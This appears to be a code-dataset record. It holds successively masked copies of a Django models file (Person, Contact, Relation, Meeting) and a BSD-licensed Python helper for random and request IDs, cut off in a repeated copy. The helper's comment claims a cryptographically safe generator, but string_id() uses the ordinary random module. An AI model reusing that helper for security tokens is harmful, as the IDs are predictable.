id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Person_meeting(models.Model):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
87
cdbf9427d48f0a5c53b6efe0de7dfea65a8afd83
# -*- coding: utf-8 -*- # Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. import os import random import string # Use cryptographic-safe random generator as provided by the OS. random_generator = random.SystemRandom() def string_id(length=8): """ Generate Random ID. Random ID contains ascii letters and digitis. Args: length (int): Character length of id. Returns: Random id string. """ return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length)) # Request ID Counter #################### req_c = None pid = None def request_id(): # Using random is pretty slow. This is way quicker. # It uses cached proc id. Then only does this append counter. # per request... # # It may not be as unique, but highly unlikely to collide # with recent requet ids. global req_c, pid if req_c is None: req_c = random.randint(1000*1000, 1000*1000*1000) if pid is None: pid = str(os.getpid()) req_id = req_c = req_c + 1 req_id = hex(req_id)[2:].zfill(8)[-8:] return pid + '-' + req_id
[ "# -*- coding: utf-8 -*-\n# Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holders nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS 